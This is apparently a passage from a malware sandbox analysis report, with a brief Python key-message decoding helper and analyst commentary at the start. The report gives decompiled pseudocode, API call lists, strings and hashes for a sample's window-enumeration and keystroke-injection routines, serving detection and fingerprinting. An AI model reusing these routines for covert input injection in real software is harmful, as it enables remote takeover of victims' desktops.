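        "extended": bool(lp & (1 << 24)),
        "alt": bool(lp & CONTEXT_CODE_ALT),
        "prev_down": bool(lp & (1 << 30)),
        "key_up": bool(lp & (1 << 31)),
    }


def should_resend(now_ms: int, last_ms: int) -> bool:
    """The listing compares GetTickCount() - saved tick against 0x1F4 and skips
    the re-send when less than 500 ms have elapsed; keep 32-bit wraparound."""
    return ((now_ms - last_ms) & 0xFFFFFFFF) >= RESEND_THROTTLE_MS


if __name__ == "__main__":
    # Assumed input for the demo: scan code 0x1E with ALT held.
    down = build_key_lparam(0x1E, alt=True)
    up = build_key_lparam(0x1E, alt=True, key_up=True)
    print(hex(WM_KEYDOWN), hex(down), decode_key_lparam(down))
    print(hex(WM_KEYUP), hex(up), decode_key_lparam(up))
    print("modifier", hex(normalize_modifier(VK_RMENU)))
```

When matching such a routine in a trace, the pairing of SMTO_ABORTIFHUNG with a one-second timeout for the synchronous send, followed by an asynchronous PostMessageA, is a more stable fingerprint than the function addresses, which change with every build.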
                                          0x00c81886
                                          0x00c81891
                                          0x00c8189f
                                          0x00c8189f
                                          0x00c81870
                                          0x00c81866
                                          0x00c818aa
                                          0x00c818b1
                                          0x00000000
                                          0x00c818b7
                                          0x00c818bd
                                          0x00c818c4
                                          0x00c818c4
                                          0x00c818d0
                                          0x00c81957
                                          0x00c81957
                                          0x00000000
                                          0x00c818d6
                                          0x00c818d8
                                          0x00c81901
                                          0x00c81905
                                          0x00c8190a
                                          0x00c8190f
                                          0x00c81912
                                          0x00c8191d
                                          0x00c8192b
                                          0x00c8192b
                                          0x00c8192f
                                          0x00c81935
                                          0x00c81951
                                          0x00000000
                                          0x00c81951
                                          0x00c818da
                                          0x00c818ee
                                          0x00000000
                                          0x00000000
                                          0x00c818f3
                                          0x00c818fc
                                          0x00000000
                                          0x00c818fc
                                          0x00c818d0
                                          0x00c818b1
                                          0x00c81601
                                          0x00c8160e
                                          0x00c81635
                                          0x00c81635
                                          0x00c8163d
                                          0x00c81650
                                          0x00c81650
                                          0x00c81658
                                          0x00c81713
                                          0x00c81713
                                          0x00c81721
                                          0x00c8172f
                                          0x00c81733
                                          0x00c8173b
                                          0x00c81740
                                          0x00c81740
                                          0x00c8174f
                                          0x00c81767
                                          0x00c81751
                                          0x00c81751
                                          0x00c8175b
                                          0x00000000
                                          0x00c81672
                                          0x00c81672
                                          0x00c81675
                                          0x00000000
                                          0x00c81685
                                          0x00c81685
                                          0x00c8168c
                                          0x00c81699
                                          0x00c8169d
                                          0x00c816a3
                                          0x00c816a6
                                          0x00c816ad
                                          0x00c816bd
                                          0x00c816bf
                                          0x00c816c3
                                          0x00c816cd
                                          0x00c816cd
                                          0x00c816dd
                                          0x00c816eb
                                          0x00c816ff
                                          0x00c81702
                                          0x00c81702
                                          0x00c81706
                                          0x00000000
                                          0x00c81706
                                          0x00c81675
                                          0x00c81658
                                          0x00c81646
                                          0x00000000
                                          0x00000000
                                          0x00c8164a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c8164a
                                          0x00c81613
                                          0x00c81621
                                          0x00c8162a
                                          0x00c81615
                                          0x00c81615
                                          0x00c81615
                                          0x00c8162f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c81587
                                          0x00c81587
                                          0x00c8158e
                                          0x00c81591
                                          0x00000000
                                          0x00c81594
                                          0x00c81596
                                          0x00c815a5
                                          0x00c815a9
                                          0x00c815b3
                                          0x00c815b5
                                          0x00c815b5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c81598
                                          0x00c81598
                                          0x00c8159a
                                          0x00c815a1
                                          0x00000000
                                          0x00c815a3
                                          0x00000000
                                          0x00c815a3
                                          0x00c815a1
                                          0x00c8157a
                                          0x00c81975

                                          APIs
                                            • Part of subcall function 00C7BEC4: GetClassNameA.USER32 ref: 00C7BED6
                                            • Part of subcall function 00C7BEC4: lstrcmpiA.KERNEL32 ref: 00C7BEE8
                                          • GetWindowThreadProcessId.USER32 ref: 00C815CA
                                          • GetKeyboardLayout.USER32 ref: 00C815D2
                                          • VkKeyScanExA.USER32 ref: 00C81624
                                          • MapVirtualKeyA.USER32 ref: 00C816AD
                                          • MapVirtualKeyA.USER32 ref: 00C81721
                                          • VkKeyScanExW.USER32(?,?,?,?,?,00C814ED), ref: 00C8184D
                                          • SendMessageTimeoutA.USER32 ref: 00C8189F
                                          • GetTickCount.KERNEL32 ref: 00C818DA
                                          • SendMessageTimeoutA.USER32 ref: 00C8192F
                                          • PostMessageA.USER32 ref: 00C81951
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Message$ScanSendTimeoutVirtual$ClassCountKeyboardLayoutNamePostProcessThreadTickWindowlstrcmpi
                                          • String ID:
                                          • API String ID: 3949878538-0
                                          • Opcode ID: c42f23df41b87a760b4589c0f5822561c428a73b1481fb86c01f744ca27fc07a
                                          • Instruction ID: f4b160dc1e7f3b2458fca7eacac6acb5579c68d968aceecaaf5f7fb92ee286c2
                                          • Opcode Fuzzy Hash: c42f23df41b87a760b4589c0f5822561c428a73b1481fb86c01f744ca27fc07a
                                          • Instruction Fuzzy Hash: E4B1043270479586EB64EF26A4043AA37EAF780B88F5C4039DE4A57764DF39C987D708
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: DllGetClassObject
                                          • API String ID: 0-1075368562
                                          • Opcode ID: 944b1b52538e065f2f049a2512e645bfd60fdd8e15ba8818f1b2d61931b6c5db
                                          • Instruction ID: f4fddc1274dd1c7a366a2c22375beb0ee05b4cc1d83da47d3c7ec7ff24ab19fe
                                          • Opcode Fuzzy Hash: 944b1b52538e065f2f049a2512e645bfd60fdd8e15ba8818f1b2d61931b6c5db
                                          • Instruction Fuzzy Hash: 60519C25384B4182EE158B1AE588329A7A1F788FE5F488222CF5E17B39DF7CC549C744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 21%
                                          			E00C828F4(void* __edx, long long __rbx, void* __rcx, long long __rdx, long long __rsi, long long __rbp, long long* __r8, void* __r9, intOrPtr _a16) {
                                          				void* _v24;
                                          				void* _v84;
                                          				intOrPtr _v88;
                                          				int _t36;
                                          				intOrPtr _t42;
                                          				long long _t48;
                                          				long long _t51;
                                          				intOrPtr* _t53;
                                          				void* _t74;
                                          				long long _t78;
                                          				long long _t81;
                                          				void* _t85;
                                          
                                          				_t85 = __r9;
                                          				_t48 = _t81;
                                          				 *((long long*)(_t48 + 8)) = __rbx;
                                          				 *((long long*)(_t48 + 0x18)) = __rbp;
                                          				 *((long long*)(_t48 + 0x20)) = __rsi;
                                          				 *((long long*)(_t48 + 0x10)) = __rdx;
                                          				_t88 = __r8;
                                          				_t74 = __rcx;
                                          				if(( *(__rcx + 0xb8) & 0x00001000) != 0) {
                                          					_t36 = WindowFromPoint();
                                          					_t51 = _t48;
                                          					if(__r8 != 0) {
                                          						_t36 = GetAncestor();
                                          						_t48 =  ==  ? _t51 : _t48;
                                          						 *__r8 = _t48;
                                          					}
                                          					if(_t51 !=  *((intOrPtr*)(_t74 + 0xe8))) {
                                          						if(_t51 == 0) {
                                          							goto L18;
                                          						} else {
                                          							goto L26;
                                          						}
                                          						while(1) {
                                          							L26:
                                          							_t36 = E00C7B9A8(_t51, _a16);
                                          							if(_t48 == 0 || _t48 == _t51) {
                                          								goto L18;
                                          							}
                                          							_t51 = _t48;
                                          						}
                                          					} else {
                                          						_v88 = 0x3c;
                                          						_t36 = GetWindowInfo(??, ??);
                                          						if(_t36 != 0) {
                                          							_t36 = PtInRect();
                                          							if(_t36 != 0) {
                                          								_t51 =  *((intOrPtr*)(_t74 + 0xc8));
                                          							}
                                          						}
                                          					}
                                          					goto L18;
                                          				} else {
                                          					r8d = 7;
                                          					ChildWindowFromPointEx(??, ??, ??);
                                          					_t78 = _t48;
                                          					EnterCriticalSection(??);
                                          					_t53 =  *((intOrPtr*)(__rcx + 0x1d0));
                                          					while(_t53 != 0) {
                                          						if( *_t53 == _t78) {
                                          							break;
                                          						} else {
                                          							_t53 =  *((intOrPtr*)(_t53 + 0x38));
                                          							continue;
                                          						}
                                          					}
                                          					if(_t53 == 0) {
                                          						L15:
                                          						LeaveCriticalSection();
                                          						if(_t88 != 0) {
                                          							 *_t88 = _t78;
                                          						}
                                          						_t36 = E00C7C3A8(_t48, _t78, _a16);
                                          						_t51 = _t48;
                                          						L18:
                                          						return _t36;
                                          					}
                                          					_t42 =  *((intOrPtr*)(_t53 + 0x2c));
                                          					while(1) {
                                          						_t53 =  *((intOrPtr*)(_t53 + 0x38));
                                          						if(_t53 == 0) {
                                          							goto L15;
                                          						}
                                          						if( *((intOrPtr*)(_t53 + 0x18)) == 0 &&  *((intOrPtr*)(_t53 + 0x30)) == 0 &&  *((intOrPtr*)(_t53 + 0x2c)) >= _t42 && E00C7BB64(_t48, _t53, _t74 + 0x88,  *_t53, _t85) >= 0 && ( *(_t53 + 0x10) & 0x40000000) == 0 && PtInRect() != 0) {
                                          							_t78 =  *_t53;
                                          						}
                                          					}
                                          					goto L15;
                                          				}
                                          			}
                                          0x00c828f4
                                          0x00c828f4
                                          0x00c828f7
                                          0x00c828fb
                                          0x00c828ff
                                          0x00c82903
                                          0x00c8291a
                                          0x00c8291d
                                          0x00c82920
                                          0x00c82a00
                                          0x00c82a06
                                          0x00c82a0c
                                          0x00c82a16
                                          0x00c82a1f
                                          0x00c82a23
                                          0x00c82a23
                                          0x00c82a2d
                                          0x00c82a77
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c82a7d
                                          0x00c82a7d
                                          0x00c82a88
                                          0x00c82a90
                                          0x00000000
                                          0x00000000
                                          0x00c82a9f
                                          0x00c82a9f
                                          0x00c82a2f
                                          0x00c82a3b
                                          0x00c82a43
                                          0x00c82a4b
                                          0x00c82a5a
                                          0x00c82a62
                                          0x00c82a68
                                          0x00c82a68
                                          0x00c82a62
                                          0x00c82a4b
                                          0x00000000
                                          0x00c82926
                                          0x00c8292d
                                          0x00c82933
                                          0x00c82940
                                          0x00c82946
                                          0x00c8294c
                                          0x00c8295e
                                          0x00c82958
                                          0x00000000
                                          0x00c8295a
                                          0x00c8295a
                                          0x00000000
                                          0x00c8295a
                                          0x00c82958
                                          0x00c82966
                                          0x00c829bc
                                          0x00c829bf
                                          0x00c829c8
                                          0x00c829ca
                                          0x00c829ca
                                          0x00c829d8
                                          0x00c829dd
                                          0x00c829e0
                                          0x00c829fc
                                          0x00c829fc
                                          0x00c82968
                                          0x00c829b3
                                          0x00c829b3
                                          0x00c829ba
                                          0x00000000
                                          0x00000000
                                          0x00c82971
                                          0x00c829b0
                                          0x00c829b0
                                          0x00c82971
                                          0x00000000
                                          0x00c829b3

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$CriticalFromPointRectSection$AncestorChildEnterInfoLeaveParent
                                          • String ID: <
                                          • API String ID: 3358615102-4251816714
                                          • Opcode ID: da555e7cd2ea4ce98741422fbed2a14a0cf4e3a6b0a623897eb3878cf9e914c4
                                          • Instruction ID: 29fa87c8d83e28abb18038dfc51c5bfc63a9c669d20c562909d3b83345fa2954
                                          • Opcode Fuzzy Hash: da555e7cd2ea4ce98741422fbed2a14a0cf4e3a6b0a623897eb3878cf9e914c4
                                          • Instruction Fuzzy Hash: 1B413632301A5096EF68AF22D5487AD73A4F748F88F488525CEAD57714DF38CA9AC748
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrcmpiW.KERNEL32(?,?,?,00C7AE5F), ref: 00C7AF07
                                          • StrCmpNIW.SHLWAPI(?,?,?,00C7AE5F), ref: 00C7AF41
                                          • StrCmpNIW.SHLWAPI(?,?,?,00C7AE5F), ref: 00C7AF67
                                          • StrChrW.SHLWAPI(?,?,?,00C7AE5F), ref: 00C7AF81
                                          • StrCmpNIW.SHLWAPI(?,?,?,00C7AE5F), ref: 00C7AFA1
                                          • lstrcmpiW.KERNEL32(?,?,?,00C7AE5F), ref: 00C7AFA9
                                          • HeapFree.KERNEL32(?,?,?,00C7AE5F), ref: 00C7AFDC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcmpi$FreeHeap
                                          • String ID: \Registry\Machine$\Registry\USER
                                          • API String ID: 4129639105-1053235272
                                          • Opcode ID: e291ea235808b443d9d5fc9bb8431afeca079be17f62087af12fe3fd8a23e32b
                                          • Instruction ID: e567855ed08e488165b7fd1ee6f426973c2c602a4b90930632c20bacaafb721f
                                          • Opcode Fuzzy Hash: e291ea235808b443d9d5fc9bb8431afeca079be17f62087af12fe3fd8a23e32b
                                          • Instruction Fuzzy Hash: 703137A2301B5081EB259FA2E840B6E67A0F785FD4F58C115DE5D87B58DF38CA46C306
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleOpenProcesslstrcmpi$FreeHeapNextProcess32
                                          • String ID: Winsta0\Default
                                          • API String ID: 1597940222-2867368725
                                          • Opcode ID: 010c9d0f6f82a17cacd812db3abcffce7f80f621337c7c0cfc1e694989eaa754
                                          • Instruction ID: 8b1b94d1dcb9b39471174300d868b33b10ff13f121c0384675a2e78bafa418b8
                                          • Opcode Fuzzy Hash: 010c9d0f6f82a17cacd812db3abcffce7f80f621337c7c0cfc1e694989eaa754
                                          • Instruction Fuzzy Hash: 9321A721704B4085FA64EB23E80471A6395EB88FE4F588330DD6D47BA9EF38C94AC744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 15%
                                          			E00C7BA38(void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16) {
                                          				signed char _v32;
                                          				signed int _v36;
                                          				intOrPtr _v72;
                                          				signed char _t22;
                                          				signed int _t29;
                                          				void* _t38;
                                          				void* _t41;
                                          				void* _t49;
                                          				void* _t53;
                                          				void* _t70;
                                          				void* _t72;
                                          				void* _t77;
                                          				void* _t78;
                                          
                                          				_t78 = __r9;
                                          				_t77 = __r8;
                                          				_t49 = __rax;
                                          				_a8 = __rbx;
                                          				_a16 = __rsi;
                                          				_t53 = __rdx;
                                          				_t72 = __rcx;
                                          				if(E00C7C050(__rax, __rdx, __rcx, __rdx, __rcx) == 0) {
                                          					L18:
                                          					_t22 = 0;
                                          					__eflags = 0;
                                          					L19:
                                          					return _t22;
                                          				}
                                          				_t38 = _t53 -  *((intOrPtr*)(_t72 + 0x58));
                                          				if(_t38 == 0) {
                                          					goto L18;
                                          				}
                                          				__imp__GetWindowLongPtrA();
                                          				asm("dec eax");
                                          				if(_t38 >= 0) {
                                          					goto L18;
                                          				}
                                          				_t22 = GetLastActivePopup();
                                          				if(__rax == 0 || __rax == _t53) {
                                          					GetWindow();
                                          					GetWindow(??, ??);
                                          					_t70 = _t49;
                                          					do {
                                          						_v72 = 0x3c;
                                          						GetWindowInfo(??, ??);
                                          						GetWindow(??, ??);
                                          						_t41 = _t49 - _t53;
                                          						if(_t41 != 0) {
                                          							goto L14;
                                          						}
                                          						_t29 = _v36;
                                          						asm("bt eax, 0x1c");
                                          						if(_t41 >= 0) {
                                          							goto L14;
                                          						}
                                          						asm("bt eax, 0x1d");
                                          						if(_t41 >= 0 && (_t29 & 0x00000020) == 0 && ((_v32 & 0x00000001) != 0 || (_t29 & 0x80c80000) != 0)) {
                                          							_t22 = E00C7BB64(_t49, _t53, _t72, _t70, _t78);
                                          							if((_t22 & 0x00000005) != 0 || _t70 == _t53) {
                                          								goto L14;
                                          							} else {
                                          								goto L19;
                                          							}
                                          						}
                                          						L14:
                                          						GetWindow();
                                          						_t70 = _t49;
                                          						_t47 = _t49;
                                          					} while (_t49 != 0);
                                          					GetWindow();
                                          					_t22 = E00C7BA38(_t47, _t49, _t53, _t72, _t49, _t72, _t77, _t78);
                                          					if(_t49 == 0) {
                                          					}
                                          				}
                                          			}

                                          Instruction addresses (the address column of the listing above, one entry per decompiled line):
                                          0x00c7ba38 0x00c7ba38 0x00c7ba38 0x00c7ba38 0x00c7ba3d 0x00c7ba47 0x00c7ba4a 0x00c7ba54 0x00c7bb50 0x00c7bb50
                                          0x00c7bb50 0x00c7bb52 0x00c7bb61 0x00c7bb61 0x00c7ba5a 0x00c7ba5e 0x00000000 0x00000000 0x00c7ba6c 0x00c7ba72
                                          0x00c7ba77 0x00000000 0x00000000 0x00c7ba80 0x00c7ba89 0x00c7ba9d 0x00c7baab 0x00c7bab1 0x00c7bab4 0x00c7bab9
                                          0x00c7bac4 0x00c7bad2 0x00c7bad8 0x00c7badb 0x00000000 0x00000000 0x00c7badd 0x00c7bae1 0x00c7bae5 0x00000000
                                          0x00000000 0x00c7bae7 0x00c7baeb 0x00c7bb05 0x00c7bb0c 0x00000000 0x00c7bb4b 0x00000000 0x00c7bb4b 0x00c7bb0c
                                          0x00c7bb13 0x00c7bb1b 0x00c7bb21 0x00c7bb24 0x00c7bb24 0x00c7bb2f 0x00c7bb3b 0x00c7bb43 0x00c7bb43 0x00c7bb43

                                          APIs
                                            • Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
                                            • Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093
                                          • GetWindowLongPtrA.USER32 ref: 00C7BA6C
                                          • GetLastActivePopup.USER32 ref: 00C7BA80
                                          • GetWindow.USER32 ref: 00C7BA9D
                                          • GetWindow.USER32 ref: 00C7BAAB
                                          • GetWindowInfo.USER32 ref: 00C7BAC4
                                          • GetWindow.USER32 ref: 00C7BAD2
                                          • GetWindow.USER32 ref: 00C7BB1B
                                          • GetWindow.USER32 ref: 00C7BB2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$ActiveAncestorInfoLastLongPopup
                                          • String ID: <
                                          • API String ID: 906851337-4251816714
                                          • Opcode ID: 539fc9f3fb8f886a674c7fe3b83c360f55a3d397cfa06b27d94c64a4624ab122
                                          • Instruction ID: eee58885ab661ae1bb148e714f20b47a2343ee4a0e8a1cc64d506de295e1c726
                                          • Opcode Fuzzy Hash: 539fc9f3fb8f886a674c7fe3b83c360f55a3d397cfa06b27d94c64a4624ab122
                                          • Instruction Fuzzy Hash: EF216B2130574487FE309B16E64432A63A1EB89BD4F58C524EEAE47B5CEF7CCD4A8705
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          • windows.immersiveshell.serviceprovider.dll, xrefs: 00C656FF
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CountCurrentPathThreadTick$FileMappedNameProcessStripTerminatelstrcmpi
                                          • String ID: windows.immersiveshell.serviceprovider.dll
                                          • API String ID: 84710471-1793758754
                                          • Opcode ID: c757c07dada5ae0178d8b665c6b00b43cf9509866eac1f24c1031e16ac57a28d
                                          • Instruction ID: ba193b59bb5845501ee7c8362632d8859d32636a16002e202a929b3938c55027
                                          • Opcode Fuzzy Hash: c757c07dada5ae0178d8b665c6b00b43cf9509866eac1f24c1031e16ac57a28d
                                          • Instruction Fuzzy Hash: 1A312735625F41CAF7218F62E848F5933A4F758B91F958226DE5A83760CF3DC949CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsBadStringPtrA.KERNEL32 ref: 00C69C98
                                            • Part of subcall function 00C69B2C: GetWindowLongPtrA.USER32 ref: 00C69B9A
                                            • Part of subcall function 00C69B2C: EnterCriticalSection.KERNEL32 ref: 00C69BCA
                                            • Part of subcall function 00C69B2C: LeaveCriticalSection.KERNEL32 ref: 00C69BF7
                                            • Part of subcall function 00C69B2C: SetWindowLongPtrA.USER32 ref: 00C69C06
                                            • Part of subcall function 00C69B2C: GetWindowLongPtrA.USER32 ref: 00C69C15
                                          • GetClassNameA.USER32 ref: 00C69CD3
                                          • lstrcmpiA.KERNEL32 ref: 00C69CEC
                                          • lstrcmpiA.KERNEL32 ref: 00C69D0E
                                          • lstrcmpiA.KERNEL32 ref: 00C69D22
                                          • lstrcmpiA.KERNEL32 ref: 00C69D36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcmpi$LongWindow$CriticalSection$ClassEnterLeaveNameString
                                          • String ID: #32770$MSTaskSwWClass$TrayNotifyWnd
                                          • API String ID: 1160596247-1364136895
                                          • Opcode ID: adeeccb7babc074936113cf2274e740870c569e2331220df0253326f0c852bcb
                                          • Instruction ID: 1976a3941b68adc75c05c9ee24880c2858a385f147e3412b1a3a7d8e688f1652
                                          • Opcode Fuzzy Hash: adeeccb7babc074936113cf2274e740870c569e2331220df0253326f0c852bcb
                                          • Instruction Fuzzy Hash: FC21332231464196FB308F26F850766B7A9FB95BC0F4C8135D99D87A68EF3CC645C718
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenW.KERNEL32 ref: 00C63AE8
                                          • lstrlenW.KERNEL32 ref: 00C63AFE
                                          • HeapAlloc.KERNEL32 ref: 00C63B16
                                          • lstrcpyW.KERNEL32 ref: 00C63B39
                                          • lstrcatW.KERNEL32 ref: 00C63B49
                                          • lstrcatW.KERNEL32 ref: 00C63B5A
                                          • HeapFree.KERNEL32 ref: 00C63BD3
                                            • Part of subcall function 00C7797C: lstrlenW.KERNEL32(?,?,?,00C63778), ref: 00C779A9
                                            • Part of subcall function 00C7797C: StrRChrW.SHLWAPI(?,?,?,00C63778), ref: 00C779BB
                                            • Part of subcall function 00C7797C: HeapAlloc.KERNEL32(?,?,?,00C63778), ref: 00C77A10
                                            • Part of subcall function 00C7797C: SetLastError.KERNEL32(?,?,?,00C63778), ref: 00C77A21
                                          • HeapFree.KERNEL32 ref: 00C63BEF
                                          • HeapFree.KERNEL32 ref: 00C63C14
                                          • SetLastError.KERNEL32 ref: 00C63C20
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Freelstrlen$AllocErrorLastlstrcat$lstrcpy
                                          • String ID:
                                          • API String ID: 895481724-0
                                          • Opcode ID: 50c6375ccdcfc14eb043f97f9d4a9d2fc6242a14cfb4b51806086a8a17dc2fd2
                                          • Instruction ID: 45cd3120825b4424a0af70fad9d4fe3c6ed1e67cea4fd8a0675db77e2b7e2174
                                          • Opcode Fuzzy Hash: 50c6375ccdcfc14eb043f97f9d4a9d2fc6242a14cfb4b51806086a8a17dc2fd2
                                          • Instruction Fuzzy Hash: DB517B66305BC486EA31CF96A884B6AB3A4FBC8FD0F488226DE5D47B15DF38C6459704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 28%
                                          			E00C825BC(void* __ebx, void* __ecx, signed long long __rax, long long __rbx, void* __rcx, signed long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16) {
                                          				long long _v16;
                                          				signed int _v24;
                                          				void* __rdi;
                                          				long _t31;
                                          				long _t48;
                                          				signed long long _t50;
                                          				signed int _t51;
                                          				void* _t53;
                                          				void* _t62;
                                          				signed long long _t66;
                                          				signed long long _t67;
                                          				void* _t69;
                                          				void* _t73;
                                          				void* _t75;
                                          
                                          				_t75 = __r9;
                                          				_t73 = __r8;
                                          				_t67 = __rsi;
                                          				_t50 = __rax;
                                          				_a8 = __rbx;
                                          				_a16 = __rsi;
                                          				_t48 = 0;
                                          				_t53 = __rcx;
                                          				if( *((intOrPtr*)(__rcx + 0x1dc)) == 0) {
                                          					__eflags =  *(__rcx + 0xb8) & 0x00001000;
                                          					if(( *(__rcx + 0xb8) & 0x00001000) != 0) {
                                          						L8:
                                          						r9d = 0;
                                          						r8d = 0;
                                          						CreateEventA(??, ??, ??, ??);
                                          						 *(_t53 + 0x208) = _t50;
                                          						__eflags = _t50;
                                          						if(_t50 != 0) {
                                          							_t13 = _t53 + 0x1f8; // 0x1f8
                                          							_t51 = _t13;
                                          							_v16 = _t51;
                                          							_v24 = _v24 & _t48;
                                          							CreateThread(??, ??, ??, ??, ??, ??);
                                          							 *((long long*)(_t53 + 0x200)) = _t51;
                                          							__eflags = _t51;
                                          							if(_t51 != 0) {
                                          								WaitForSingleObject();
                                          								CloseHandle(??);
                                          								_t23 = _t53 + 0x208;
                                          								 *_t23 =  *(_t53 + 0x208) & _t67;
                                          								__eflags =  *_t23;
                                          							} else {
                                          								_t48 = GetLastError();
                                          								CloseHandle(??);
                                          								 *(_t53 + 0x208) =  *(_t53 + 0x208) & 0x00000000;
                                          							}
                                          							_t31 = _t48;
                                          						} else {
                                          							_t31 = GetLastError();
                                          						}
                                          						L14:
                                          						return _t31;
                                          					}
                                          					InitializeCriticalSection();
                                          					__eflags =  *(__rcx + 0xb8) & 0x00000010;
                                          					if(( *(__rcx + 0xb8) & 0x00000010) != 0) {
                                          						goto L8;
                                          					}
                                          					GetWindow();
                                          					while(1) {
                                          						GetWindow();
                                          						_t66 = _t50;
                                          						_t62 = _t53;
                                          						__eflags = _t50;
                                          						if(__eflags == 0) {
                                          							break;
                                          						}
                                          						E00C81B4C(_t53, _t62, _t66, _t66, _t67, _t69, _t73, _t75);
                                          					}
                                          					E00C7C170(__eflags, _t50, _t53, _t62,  *((intOrPtr*)(_t53 + 0xe8)), _t67, _t69, _t73, _t75);
                                          					goto L8;
                                          				}
                                          				_t31 = 0;
                                          				goto L14;
                                          			}

                                          Instruction addresses (the address column of the listing above, one entry per decompiled line):
